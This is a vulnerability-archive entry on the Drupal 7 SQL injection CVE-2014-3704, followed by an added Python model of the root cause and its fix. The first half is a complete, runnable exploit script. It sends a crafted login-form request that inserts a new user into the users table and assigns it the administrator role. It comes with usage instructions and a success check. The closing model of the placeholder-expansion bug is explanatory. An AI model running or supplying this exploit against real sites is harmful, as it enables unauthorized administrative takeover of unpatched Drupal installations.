Drupal 7.x SQL Injection exp (CVE-2014-3704) - vulnerability warning - the black bar safety net

2014-10-22T00:00:00
ID MYHACK58:62201454897
Type myhack58
Reporter Anonymous
Modified 2014-10-22T00:00:00

Description

```python
import urllib2, sys
from drupalpass import DrupalHash  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

if len(sys.argv) != 4:
    print ""
    print "python 7.xSQL.py <http://xxoo.com/drupal> admin 123456"
    print ""
    sys.exit(1)

host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Drupal 7 password hash for the chosen password (salt string as in the original script)
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqhaf82wlbhpt2k5tzkzml", password).get_hash()

# The login block form handler runs the vulnerable user lookup (Drupal 7 before 7.32)
target = '%s/?q=node&destination=node' % host

# The array key of name[...] is spliced unescaped into the IN() placeholder expansion
insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\'" \
    + user \
    + "'+,+pass+%3d+'" \
    + hash[:55] \
    + "';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
# print insert_user

content = urllib2.urlopen(url=target, data=insert_user).read()

# This PHP warning in the response indicates that the injected statements were executed
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
```

Download https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py and put it in the same directory.
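The root cause behind the payload above, modelled in Python as an added example (this is neither the page's code nor Drupal's): Drupal 7's DatabaseConnection::expandArguments() built placeholder names from the keys of an array-valued query argument, so the string key of name[...] ended up inside the SQL text; the SA-CORE-2014-005 fix reindexes the array with array_values() before expansion. The function names and the harmless ";INJECTED" marker key are constructed for this example.

```python
import re


def expand_arguments(query, args, reindex=False):
    """Model of Drupal 7's DatabaseConnection::expandArguments() (constructed).

    An array-valued argument is expanded into one placeholder per element,
    e.g. ':name' -> ':name_0, :name_1'. Before the fix the suffix after the
    underscore is the caller's array key; with reindex=True (array_values()
    in the real patch) it is always a 0-based integer.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, (list, dict)):
            continue
        pairs = list(data.items()) if isinstance(data, dict) else list(enumerate(data))
        if reindex:
            pairs = list(enumerate(value for _, value in pairs))
        new_keys = {'%s_%s' % (key, i): value for i, value in pairs}
        placeholders = ', '.join(new_keys)
        # Splice the placeholder list into the SQL text (Drupal used preg_replace here)
        query = re.sub(re.escape(key) + r'\b', lambda m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


def is_clean_expansion(template, expanded):
    """True when the expanded SQL differs from the template only by replacing each
    placeholder with a comma-separated list of well-formed :word placeholders."""
    parts = re.split(r':\w+', template)
    pattern = r':\w+(?:, :\w+)*'.join(re.escape(p) for p in parts)
    return re.fullmatch(pattern, expanded) is not None


if __name__ == "__main__":
    template = "SELECT uid FROM users WHERE name IN (:name) AND status = 1"
    # Constructed hostile input: the array key carries text, the value is irrelevant
    hostile = {':name': {'0 ;INJECTED': 'bob', '0': 'larry'}}
    for fixed in (False, True):
        sql, _ = expand_arguments(template, hostile, reindex=fixed)
        print("fixed=%s clean=%s %s" % (fixed, is_clean_expansion(template, sql), sql))
```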